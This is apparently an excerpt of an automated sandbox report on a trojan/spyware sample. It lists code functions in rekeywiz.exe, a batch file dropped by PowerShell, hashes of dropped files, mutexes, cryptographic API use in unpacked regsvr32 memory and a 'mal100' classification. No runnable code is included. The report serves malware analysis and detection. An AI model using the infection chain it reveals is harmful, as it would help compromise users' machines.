Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04094D0	18_2_00007FF7F04094D0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F040B630	18_2_00007FF7F040B630
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03B2FE9	18_2_00007FF7F03B2FE9
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0407170	18_2_00007FF7F0407170
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F044D160	18_2_00007FF7F044D160
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03DB200	18_2_00007FF7F03DB200
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CD1D0	18_2_00007FF7F03CD1D0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03D3290	18_2_00007FF7F03D3290
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0467330	18_2_00007FF7F0467330
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0453350	18_2_00007FF7F0453350
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CB350	18_2_00007FF7F03CB350
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0465410	18_2_00007FF7F0465410
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043F440	18_2_00007FF7F043F440
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04234B6	18_2_00007FF7F04234B6
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03ED520	18_2_00007FF7F03ED520
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0457530	18_2_00007FF7F0457530
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E15E0	18_2_00007FF7F03E15E0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043F5F0	18_2_00007FF7F043F5F0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04615DD	18_2_00007FF7F04615DD
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F75F0	18_2_00007FF7F03F75F0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04295B6	18_2_00007FF7F04295B6
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03C1665	18_2_00007FF7F03C1665
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042D671	18_2_00007FF7F042D671
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043D6A8	18_2_00007FF7F043D6A8
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03B56D2	18_2_00007FF7F03B56D2
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0417770	18_2_00007FF7F0417770
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0451780	18_2_00007FF7F0451780
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F044F730	18_2_00007FF7F044F730
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045B720	18_2_00007FF7F045B720
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0449750	18_2_00007FF7F0449750
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03BF7E0	18_2_00007FF7F03BF7E0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03DB800	18_2_00007FF7F03DB800
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042B7FD	18_2_00007FF7F042B7FD
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042D887	18_2_00007FF7F042D887
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043F840	18_2_00007FF7F043F840
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04218A0	18_2_00007FF7F04218A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F041F960	18_2_00007FF7F041F960
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0439920	18_2_00007FF7F0439920
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043B9B0	18_2_00007FF7F043B9B0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CBA80	18_2_00007FF7F03CBA80
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03B1A31	18_2_00007FF7F03B1A31
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03FDA50	18_2_00007FF7F03FDA50
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0411A40	18_2_00007FF7F0411A40
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E1B00	18_2_00007FF7F03E1B00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0455B00	18_2_00007FF7F0455B00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0413AA0	18_2_00007FF7F0413AA0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0467AC0	18_2_00007FF7F0467AC0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03C9B30	18_2_00007FF7F03C9B30
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0423B40	18_2_00007FF7F0423B40
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F044DBE0	18_2_00007FF7F044DBE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0459BC0	18_2_00007FF7F0459BC0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CDC80	18_2_00007FF7F03CDC80
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0465CE0	18_2_00007FF7F0465CE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03FDD00	18_2_00007FF7F03FDD00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E5CC0	18_2_00007FF7F03E5CC0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045BDE0	18_2_00007FF7F045BDE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0429E0B	18_2_00007FF7F0429E0B
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043FE00	18_2_00007FF7F043FE00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E3DD0	18_2_00007FF7F03E3DD0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043DEF0	18_2_00007FF7F043DEF0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03FFF10	18_2_00007FF7F03FFF10
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03BFF83	18_2_00007FF7F03BFF83
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045BF20	18_2_00007FF7F045BF20
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043FFF0	18_2_00007FF7F043FFF0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0467FA0	18_2_00007FF7F0467FA0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E3FB7	18_2_00007FF7F03E3FB7
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0442030	18_2_00007FF7F0442030
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F044A0E0	18_2_00007FF7F044A0E0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04640C0	18_2_00007FF7F04640C0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CC170	18_2_00007FF7F03CC170
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03DE180	18_2_00007FF7F03DE180
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042C120	18_2_00007FF7F042C120
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045C1F0	18_2_00007FF7F045C1F0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04441B0	18_2_00007FF7F04441B0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03BE28F	18_2_00007FF7F03BE28F
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042E23A	18_2_00007FF7F042E23A
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F82A0	18_2_00007FF7F03F82A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045A2A0	18_2_00007FF7F045A2A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043C358	18_2_00007FF7F043C358
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043C356	18_2_00007FF7F043C356
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04103A0	18_2_00007FF7F04103A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03C446C	18_2_00007FF7F03C446C
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CA4A0	18_2_00007FF7F03CA4A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F044E4C0	18_2_00007FF7F044E4C0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E4579	18_2_00007FF7F03E4579
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0448520	18_2_00007FF7F0448520
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03C26E2	18_2_00007FF7F03C26E2
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0456710	18_2_00007FF7F0456710
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04506A0	18_2_00007FF7F04506A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03EA740	18_2_00007FF7F03EA740
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0454750	18_2_00007FF7F0454750
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04227A4	18_2_00007FF7F04227A4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03C47CD	18_2_00007FF7F03C47CD
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CC860	18_2_00007FF7F03CC860
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F0870	18_2_00007FF7F03F0870
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03D0820	18_2_00007FF7F03D0820
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F042A990	18_2_00007FF7F042A990
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0442920	18_2_00007FF7F0442920
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0434920	18_2_00007FF7F0434920
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0438A20	18_2_00007FF7F0438A20
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0452B00	18_2_00007FF7F0452B00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F4AC0	18_2_00007FF7F03F4AC0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F2B80	18_2_00007FF7F03F2B80
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0454BF0	18_2_00007FF7F0454BF0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03F8C00	18_2_00007FF7F03F8C00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045EC60	18_2_00007FF7F045EC60
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CAC30	18_2_00007FF7F03CAC30
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0458CF0	18_2_00007FF7F0458CF0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0450CE0	18_2_00007FF7F0450CE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F041ED00	18_2_00007FF7F041ED00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0428CAC	18_2_00007FF7F0428CAC
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03E0D80	18_2_00007FF7F03E0D80
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F045ADE0	18_2_00007FF7F045ADE0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03BEDB4	18_2_00007FF7F03BEDB4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F0402E70	18_2_00007FF7F0402E70
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043CFCB	18_2_00007FF7F043CFCB
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03EF060	18_2_00007FF7F03EF060
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03CF030	18_2_00007FF7F03CF030
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F041D0A0	18_2_00007FF7F041D0A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F043F0A0	18_2_00007FF7F043F0A0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB62D24	18_2_000002A4ACB62D24
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB65ADC	18_2_000002A4ACB65ADC
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB93A4D	18_2_000002A4ACB93A4D
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB83A38	18_2_000002A4ACB83A38
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6DCE4	18_2_000002A4ACB6DCE4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB77684	18_2_000002A4ACB77684
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB85918	18_2_000002A4ACB85918
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB7D854	18_2_000002A4ACB7D854
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8F940	18_2_000002A4ACB8F940
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB67270	18_2_000002A4ACB67270
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB514D0	18_2_000002A4ACB514D0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB895D4	18_2_000002A4ACB895D4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB855B0	18_2_000002A4ACB855B0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6F618	18_2_000002A4ACB6F618
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6D010	18_2_000002A4ACB6D010
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB66F24	18_2_000002A4ACB66F24
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB77094	18_2_000002A4ACB77094
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8F1D0	18_2_000002A4ACB8F1D0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB84A50	18_2_000002A4ACB84A50
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8CC00	18_2_000002A4ACB8CC00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB76D18	18_2_000002A4ACB76D18
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8ECE4	18_2_000002A4ACB8ECE4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB84DE8	18_2_000002A4ACB84DE8
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB90D90	18_2_000002A4ACB90D90
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB786B4	18_2_000002A4ACB786B4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB52628	18_2_000002A4ACB52628
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8A81C	18_2_000002A4ACB8A81C
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6C750	18_2_000002A4ACB6C750
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB848D0	18_2_000002A4ACB848D0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB90874	18_2_000002A4ACB90874
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB8E984	18_2_000002A4ACB8E984
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB5C25C	18_2_000002A4ACB5C25C
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB90270	18_2_000002A4ACB90270
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6E398	18_2_000002A4ACB6E398
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB96434	18_2_000002A4ACB96434
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB80478	18_2_000002A4ACB80478
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB85EC8	18_2_000002A4ACB85EC8
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB6BEB8	18_2_000002A4ACB6BEB8
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB73EA4	18_2_000002A4ACB73EA4
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB83F70	18_2_000002A4ACB83F70
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_000002A4ACB70174	18_2_000002A4ACB70174

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Gga6.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\M08e.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\utox_x86_x64.exe D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97

Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F045D4B0 appears 72 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F0447030 appears 31 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F045C954 appears 41 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F0447290 appears 129 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F03C7EF0 appears 224 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F044C9D0 appears 64 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F0447520 appears 48 times
Source: C:\Windows\System32\rekeywiz.exe	Code function: String function: 00007FF7F0410EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D280EF0 appears 40 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2B7030 appears 31 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D237EF0 appears 224 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2B7520 appears 48 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2BC9D0 appears 64 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2CC954 appears 41 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2B7290 appears 129 times
Source: C:\Users\Public\ajbs50ul.bat	Code function: String function: 00007FF63D2CD4B0 appears 72 times

Source: ajbs50ul.bat.3.dr	Static PE information: Number of sections : 11 > 10
Source: M08e.ini.4.dr	Static PE information: Number of sections : 11 > 10
Source: utox_x86_x64.exe.3.dr	Static PE information: Number of sections : 21 > 10

Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.6.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.1b040000.4.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.regsvr32.exe.2554f70.0.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.3.regsvr32.exe.2554f70.7.raw.unpack, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@30/20@3/32

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D2785F0 memset,FormatMessageW,GetLastError,

4_2_00007FF63D2785F0

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D287140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,

4_2_00007FF63D287140

Source: C:\Users\user\Desktop\utox_x86_x64.exe

Code function: 8_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent,

8_2_00614FA0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\ajbs50ul.bat

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\cbRHd
Source: C:\Users\user\Desktop\utox_x86_x64.exe	Mutant created: \Sessions\1\BaseNamedObjects\uTox
Source: C:\Windows\System32\rekeywiz.exe	Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1717266160.000001F9E06CD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
